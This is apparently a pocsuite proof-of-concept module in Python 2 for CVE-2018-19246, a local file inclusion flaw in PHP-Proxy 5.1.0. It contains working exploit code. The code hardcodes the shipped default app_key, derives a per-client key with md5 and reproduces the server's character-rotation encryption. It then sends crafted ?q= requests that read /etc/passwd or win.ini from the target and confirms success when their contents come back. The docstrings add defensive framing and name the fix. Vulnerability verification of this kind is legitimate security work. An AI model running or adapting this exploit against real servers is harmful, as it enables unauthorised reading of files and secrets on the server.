#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pocsuite.api.request import req
from pocsuite.api.poc import register, Output, POCBase
from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url
from hashlib import md5
from base64 import b64encode
from string import maketrans
import socket
class TestPOC(POCBase):
    """pocsuite check for CVE-2018-19246 (PHP-Proxy 5.1.0 local file inclusion).

    PHP-Proxy carries the proxied URL in the encrypted ``q`` query parameter.
    The pre-installed bundle ships with a fixed ``app_key``; this check derives
    a per-client key from that default (md5 of ``app_key`` plus the address the
    request will come from, as far as this code shows), wraps a ``file://`` URL
    for a well-known local file in it, and reports success when that file's
    contents are echoed back.

    From a defender's view the fix is the one in ``solution``: regenerate the
    ``app_key`` so the shipped default no longer produces a valid ``q``. The
    observable symptom is an ``index.php?q=...`` response containing local file
    contents such as ``/etc/passwd`` or ``win.ini``.
    """
    # --- pocsuite metadata; most fields are left empty by the author ---
    vulID = ''''''
    cveID = '''CVE-2018-19246'''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = '''5.1.0'''  # affected PHP-Proxy version
    author = ''''''
    vulDate = '''2018-11-13'''
    createDate = ''''''
    updateDate = ''''''
    name = '''PHP-Proxy 5.1.0 - Local File Inclusion'''
    desc = '''Downloadable pre-installed version of PHP-Proxy 5.1.0 make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. http://php-proxy-site/index.php?q=[encrypted_string_value]'''
    solution = '''Use the setup.txt script included on the downloadable pre-installed version of PHP-Proxy to generate and overwrite the default app_key'''
    severity = '''7.5 HIGH'''
    vulType = ''''''
    taskType = ''''''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['']
    install_requires = ['''''']

    def str_rot_pass(self, content, cipher, decrypt=False):
        """Shift every character of *content* by the matching *cipher* character.

        Character ``i`` of *content* is offset by the code point of
        ``cipher[i % len(cipher)]``: added when encrypting, subtracted when
        ``decrypt`` is True. Presumably this reproduces PHP-Proxy's own string
        "rotation" so the server will accept the result. Python 2 ``chr`` only
        accepts 0-255, so a shifted value outside that range raises
        ``ValueError``; with the ASCII file names and hex key used in
        ``_verify`` the sum stays below 256. Only the encrypt direction is
        exercised in this file.
        """
        cipher_len = len(cipher)
        str_len = len(content)
        result = ''
        for i in range(str_len):
            # Per-character offset, cycling through the cipher key.
            asc = ord(content[i]) - ord(cipher[i % cipher_len]) if decrypt else ord(content[i]) + ord(cipher[i % cipher_len])
            result += chr(asc)
        return result

    def base64_url_encode(self, content):
        """Return *content* as URL-safe base64 (``+``/``/`` -> ``-``/``_``), padding stripped.

        Works on Python 2 byte strings via ``string.maketrans``;
        ``base64.urlsafe_b64encode(content).rstrip('=')`` would be the
        one-call equivalent.
        """
        table = maketrans('+/', '-_')
        return b64encode(content).translate(table).rstrip('=')

    def _verify(self):
        """Probe the target and return a pocsuite ``Output``.

        Steps: work out the local address the request will originate from,
        derive the key from the default ``app_key`` and that address, build one
        encrypted ``?q=`` path per probe file, and stop at the first response
        that echoes the expected file marker.
        """
        self.url, ip, port = parse_ip_port(self.target, 80)
        result = {}
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
        }
        # Probe files paired by index with the marker expected in each one
        # (Linux /etc/passwd, Windows win.ini); both are world-readable, so a
        # match confirms file read without touching anything sensitive.
        files = ['file:///etc/passwd', 'file:///C:/Windows/win.ini']
        checkings = ['root:', '[fonts]']
        # Open a UDP socket towards the target to learn which local IP would
        # be used to reach it. Nothing is transmitted: connect() on a UDP
        # socket only records the peer and resolves the local address, so the
        # port number here is irrelevant to that lookup.
        # NOTE(review): if socket.socket() itself raises, `so` is unbound when
        # the finally block runs and a NameError masks the original error; a
        # guarded close (or `with`) would be safer.
        u_ip = '127.0.0.1'
        try:
            so = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            so.connect((ip, 80))
            u_ip = so.getsockname()[0]
        finally:
            so.close()
        # Default app_key from the pre-installed bundle (see `solution`).
        # Deployments that regenerated their key will not accept these
        # requests; a failure therefore only means this default did not work.
        app_key = 'aeb067ca0aa9a3193dce3a7264c90187'
        # Key as this code derives it: md5 of app_key and the client address.
        key = md5(app_key + u_ip).hexdigest()
        # One encrypted ?q= path per probe file (note `file` shadows the Py2
        # builtin inside the comprehension; harmless but easy to misread).
        paths = ['?q=' + self.base64_url_encode(self.str_rot_pass(file, key)) for file in files] # vulnerable paths
        for i in range(len(paths)):
            path = paths[i]
            vul_url = make_verify_url(self.url, path, mod=0) # build the full URL (project helper; mod=0 semantics not visible here)
            data = '' # request body: none, everything is in the query string
            resp = req.get(vul_url,
                           headers=headers,
                           data=data,
                           verify=False,
                           allow_redirects=False,
                           timeout=10)
            # Success: 200 and the marker paired with this probe file appears
            # in the body. Record the exchange and stop at the first hit.
            if resp.status_code == 200 and checkings[i] in resp.content: # success condition
                result['VerifyInfo'] = http_packet(resp)
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['port'] = port
                break
        return self.parse_output(result)

    def _attack(self):
        """Attack mode does nothing beyond the verification probe."""
        return self._verify()

    def parse_output(self, result):
        """Wrap *result* in a pocsuite ``Output``: success if non-empty, else 'Failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output
# Register the PoC class with the pocsuite framework when the module is loaded.
register(TestPOC)